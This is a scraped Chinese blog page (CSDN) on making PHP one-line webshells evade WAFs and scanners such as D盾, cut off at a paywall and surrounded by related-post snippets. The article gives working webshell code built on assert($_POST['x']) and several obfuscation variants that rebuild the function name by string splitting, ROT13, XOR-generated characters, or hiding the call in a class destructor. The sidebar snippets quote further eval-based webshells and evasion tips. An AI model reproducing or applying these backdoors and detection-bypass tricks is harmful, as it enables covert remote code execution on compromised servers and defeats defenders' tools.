科迅免杀php一句话_谈谈php一句话木马的免杀

最新推荐文章于 2024-05-30 16:21:29 发布
最新推荐文章于 2024-05-30 16:21:29 发布
阅读量1.6k 收藏 7
点赞数
文章标签: 科迅免杀php一句话
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_27744023/article/details/112046850
版权

文章最后更新时间为:2019年07月05日 00:17:52

一句话木马叱咤江湖这么多年还是如此活跃,我个人理解是,方便,相比于二进制后门或者大马,一句话木马足够短,容易上传,并且有众多客户端,菜刀,Cknife,蚁剑,对于脚本小子来说,一句话木马大大降低了渗透的门槛。

但是一句话木马,已经不能适应现在的局势了,如今各大服务器纷纷装上了waf,一句话木马一旦被检测出来,一是会封ip,二是会发出报警信息,引起对方的警觉。

本文就来简单探讨一下php一句话木马的免杀,包括静态免杀和动态免杀。

1.静态免杀

php木马的静态免杀是很容易的,静态免杀基本是通过各种加密或者移位亦或等方式来隐藏关键词。下面以很常见的一句话木马举例:<?php @assert($_POST['x']);?>

1.1 隐藏关键字

waf检测到assert这个关键词,很大概率会被检测出来,那么我们可以尝试用别的词来生成,具体的生成方式有很多种,这里列举一下常见的几种方式,其实效果都差不多。拆解合并<?php

$ch = explode(".","hello.ass.world.er.t");

$c = $ch[1].$ch[3].$ch[4]; //assert

$c($_POST['x']);

?>

目前来说,这种方式已经很难奏效了。利用各种函数、编码

比如对套上一层ROT13编码$c=str_rot13('n!ff!re!nffreg');

$str=explode('!',$c)[3];

还有很多加解密方式,利用各种函数如array_map、array_key、preg_replace来隐藏关键字,这里就不多说了。随机亦或产生

这里可以参考 https://github.com/yzddmr6/webshell-venom,想法也很简单,就是利用了php的亦或来生成所需要的字母。比如

"Y"^"\x38"的结果就是a,同样的生成assert即可。$_StL="Y"^"\x38";

$_ENr="T"^"\x27";

$_ohw="^"^"\x2d";

$_gpN="~"^"\x1b";

$_fyR="g"^"\x15";

$_pAs="H"^"\x3c";

$c=$_StL.$_ENr.$_ohw.$_gpN.$_fyR.$_pAs;

上面讲了三种隐藏关键字的方式,作用大同小异,个人来说较推荐随机亦或的方式,有脚本在,也方便许多。

1.2 将关键操作隐藏在各种类、函数中

其实主要的目的还是做混淆。比如下面这个一句话木马:<?php

$ch = explode(".","hello.ass.world.er.rt.e.saucerman");

$c = $ch[1].$ch[5].$ch[4]; //assert

@$c($_POST['x']);

?>

在用D盾进行扫描时,还是很容易被检测出来。

我们可以把他隐藏在类中:<?php

class Test{

public $config='';

function __destruct(){

$ch = explode(".","

最低0.47元/天 解锁文章
吟澜
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
科迅数字化校园方案_高职院校.docx
06-01
科迅数字化校园方案是针对高职院校的一套全面的信息化解决方案,旨在通过先进的信息技术手段,提升教育质量和管理效率,构建一个高度信息化的人才培养环境。这一方案涵盖了教学、管理等多个方面,旨在利用多媒体、...
Webshell管理工具
热门推荐
weixin_59872639的博客
01-15 1万+
中国蚁剑 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。 中国蚁剑的核心功能 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 中国蚁剑的简单使用 环境需求 windows攻击机,装有蚁剑 windows靶机,有phpstudy环境 步骤1:写一个简单的一句话木马 <?php @eval($_POST['123456'])
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3072
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
关于PHP的webshell免杀小结
最新发布
2401_84488651的博客
05-30 883
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
【安全攻略】Thinkphp5.0全局拦截一句话木马等非法请求
美奇软件开发工作室
12-10 3455
导读: 最近在查看网站日志时,发现有很多一句话木马的非法请求,如下: 1、在controller控制器目录里创建一个Common.php文件,继承自Controller <?php namespace app\index\controller; use think\Controller; use think\Request; class Common extends Controller { protected function _initialize() { //检测IP是不.
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5057
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
【我的收集】
kimojinmmp的博客
05-21 896
1.Windows命令 2.安全加固 3.windows系统排查 4.linux系统排查 5.linux日志 6.webshell特征 7.FastJson反序列化 8.分析,研判 9.Shiro 550 反序列化 10.Log4j 11.挖矿木马查杀 12.shiro权限绕过 12.沙箱逃逸 1. Windows 日志:C:\Windows\System32\winevt\Logs 命令:Eventvwr.msc 2.安全加固 (1)禁用或者删除无用的账号,检查特殊账户(可远程登录、用户权限高的账号),必
免费短信验证码接口
03-16
在中国的IT行业中,短信验证码接口是一项非常重要的服务,它广泛应用于各类互联网产品和服务,包括网站、手机App以及物流等业务领域。短信验证码接口的主要功能是为用户提供安全验证,确保用户身份的真实性,防止...
KesionIEXAM科迅在线考试系统 v5.0
12-30
KESIONIEXAM V5.0在线考试系统ASP.NET 5.0技术架构设计,采用MVC全新架构,支持“pc版+手机版+微信端+原生app”多终端,一站式数据库管理,后台统一添加内容,能够满足用户大规模的在线考
KesionIMALL科迅在线商城系统 v5.0
12-30
KESIONIMALL在线商城系统经过KESION电商全体研发人员的不懈努力下,KESION(.NET版系列)之KesionIMALL电商产品终于上线啦!!相对之前的版本,此次新版5.0全新MVC架构,清新靓丽的多模板风
KesionICMS科迅智能建站系统(通用版) v5.0
12-30
经过KESION全体研发人员的不懈努力下,KESION(.NET版系列)之KeisonICMS智能建站系统最新版v5.0终于登场啦!!相对之前的版本,此次新版5.0全新mvc架构,清新靓丽的多模板风格,定让您目
PHP一句话 免杀
10-23
PHP一句话 免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
信息安全 数据赛 铁人三项_[信息安全铁人三项赛总决赛](数据赛)第二题
weixin_39897758的博客
12-19 3308
WriteUps首先根据队友的发现 , 找到了攻击者的 ip : 172.16.10.121然后这条命令将所有的 http 数据包的请求以及相应全部提取出来写了一个 Shell 脚本 , 提取完所有的包大概也就用了两分钟左右的时间tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((...
2017-01-27-一句话木马原理详解
Be Smart
03-17 4736
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
PHP WebShell变形技术总结
3569
12-09 1568
http://www.freebuf.com/articles/web/155891.html 简介 WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。 目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为
php一句话木马免杀
qq_58683895的博客
11-21 1574
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
网络安全菜鸟学习之漏洞篇——代码执行漏洞(一)
gqzszzy的博客
10-28 718
这篇文章我们来学习学习代码执行漏洞。代码执行漏洞顾名思义,是由于程序员编写程序的时候使用了一些不安全的函数所造成的。这样说不够生动,我们来学习一下就懂了。 这篇文章我们来学习eval()和assert()。 说到eval()和assert()不得不提到了一句话木马。(如下) <?php @eval($_POST[value]);?> 我们发现一句话木马就是使用的是eval。我们知道我们可以通过蚁剑连接一句话木马,从而控制别人后台。那么我们是不是可以猜测一句话木马是这个函数照成的。因此我们来做以
PHP一句话木马免杀
小刚的博客
07-26 6288
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
科迅图书管理系统纸质图书馆操作流程手册借鉴.pdf
01-05
"该文档是‘科迅图书管理系统纸质图书馆操作流程手册借鉴.pdf’,主要介绍了...这个手册详细阐述了纸质图书馆借助科迅图书管理系统进行高效运作的具体步骤,对于图书馆工作人员来说,是一份极具参考价值的操作指南。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值